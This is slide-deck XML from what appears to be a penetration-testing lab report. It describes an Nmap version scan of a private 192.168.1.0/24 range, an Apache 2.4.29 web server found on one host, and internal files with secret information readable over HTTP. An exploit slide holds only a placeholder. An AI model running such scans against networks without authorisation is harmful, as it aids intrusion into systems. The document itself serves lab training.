              <a:t>NMap was then used on the known network IP address range. The “-sV” option was used to help determine possible software and operating system versions as part of the scan.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Initial scan showed 1 machine had port 80 open for http. The other machines are ignored and eliminated as known machines with no port(s) of significance.  </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Nmap -sV 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="317" name="Google Shape;1115;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="887760"/>
            <a:ext cx="533160" cy="533520"/>
            <a:chOff x="457200" y="887760"/>
            <a:chExt cx="533160" cy="533520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="318" name="Google Shape;1116;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="887760"/>
              <a:ext cx="533160" cy="476280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solid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2100" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="319" name="Google Shape;1117;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="593640" y="1276920"/>
              <a:ext cx="260640" cy="144360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="320" name="Google Shape;1118;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228840" y="887760"/>
            <a:ext cx="533160" cy="533520"/>
            <a:chOff x="3228840" y="887760"/>
            <a:chExt cx="533160" cy="533520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="321" name="Google Shape;1119;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3228840" y="887760"/>
              <a:ext cx="533160" cy="476280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solid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2100" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="322" name="Google Shape;1120;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="3365640" y="1276920"/>
              <a:ext cx="260640" cy="144360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Google Shape;1121;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3495240" y="1480680"/>
            <a:ext cx="2428200" cy="3153960"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Google Shape;1122;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3495960" y="1480680"/>
            <a:ext cx="2428200" cy="3153960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="182880" rIns="182880" tIns="182880" bIns="182880" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1050" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>The scan helped show all of the available ports on the list of 4 networked computers in the IP range given. On the third machine listed, 192.168.1.105, port 80 for HTTP was open. This meant that there was an active web server available on that machine with an Apache server v2.4.29. When accessing the IP address in a web browser, readable text documents of internal communication messages were found with secret information.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1050" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="325" name="Google Shape;1123;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134040" y="888480"/>
            <a:ext cx="533160" cy="533520"/>
            <a:chOff x="6134040" y="888480"/>
            <a:chExt cx="533160" cy="533520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="326" name="Google Shape;1124;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6134040" y="888480"/>
              <a:ext cx="533160" cy="476280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solid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2100" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="327" name="Google Shape;1125;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6270480" y="1277640"/>
              <a:ext cx="260640" cy="144360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Google Shape;1126;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6400440" y="1481400"/>
            <a:ext cx="2428200" cy="3251880"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;1127;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401160" y="1481400"/>
            <a:ext cx="2371320" cy="3251880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="182880" rIns="182880" tIns="182880" bIns="182880" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>[INSERT: screenshot or command output illustrating the exploit.]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="330" name="Google Shape;1128;p62" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089040" y="1421280"/>
            <a:ext cx="2909880" cy="34380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158</TotalTime>
  <Application>LibreOffice/7.3.2.2$Windows_X86_64 LibreOffice_project/49f2b1bff42cfccbd8f788c8dc32c1c309559be0</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2022-05-18T01:56:04Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>